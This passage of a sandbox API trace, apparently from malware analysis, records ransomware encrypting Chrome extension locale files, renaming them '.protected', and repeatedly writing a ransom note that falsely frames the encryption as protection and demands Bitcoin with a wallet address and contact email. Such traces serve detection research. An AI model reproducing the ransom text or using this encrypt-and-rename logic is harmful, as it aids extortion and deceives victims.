(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.008] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.008] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.009] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.009] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.009] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.009] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.009] CloseHandle (hObject=0x164) returned 1 [0081.010] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="Windows") returned -1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="Program Files") returned -1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="Program Files (x86)") returned -1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="$Recycle.bin") returned 1 [0081.010] lstrcmpiW (lpString1="es_419", lpString2="System Volume Information") returned -1 [0081.010] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419") returned 149 [0081.010] lstrcmpW (lpString1="es_419", lpString2=".") returned 1 [0081.010] lstrcmpW (lpString1="es_419", lpString2="..") returned 1 [0081.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\*") returned 151 [0081.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.010] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.010] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.010] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.010] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.010] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\.") returned 151 [0081.010] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.010] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.010] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.010] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.010] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.010] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.010] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\..") returned 152 [0081.010] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.011] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.011] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.011] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.011] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json") returned 163 [0081.011] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.011] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.013] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.013] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x29b, lpOverlapped=0x0) returned 1 [0081.013] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.013] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.013] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.013] CloseHandle (hObject=0x168) returned 1 [0081.013] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.protected") returned 173 [0081.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.protected")) returned 1 [0081.014] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.014] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.014] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\RESTORE_FILES.txt") returned 167 [0081.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.015] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.015] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.015] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.015] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.016] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.016] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.016] CloseHandle (hObject=0x164) returned 1 [0081.016] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.016] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0081.016] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0081.016] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0081.016] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0081.016] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0081.016] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et") returned 145 [0081.016] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0081.016] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0081.016] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\*") returned 147 [0081.016] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.016] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.016] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.016] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.016] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.016] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.016] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\.") returned 147 [0081.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.017] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.017] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.017] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.017] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.017] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\..") returned 148 [0081.017] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.017] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.017] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.017] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.017] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.017] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.017] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.017] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.017] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.018] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.018] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.018] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json") returned 159 [0081.018] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.018] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x261, lpOverlapped=0x0) returned 1 [0081.020] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.020] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x261, lpOverlapped=0x0) returned 1 [0081.020] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.020] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.020] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.020] CloseHandle (hObject=0x168) returned 1 [0081.020] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.protected") returned 169 [0081.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.protected")) returned 1 [0081.021] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.021] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.021] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\RESTORE_FILES.txt") returned 163 [0081.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 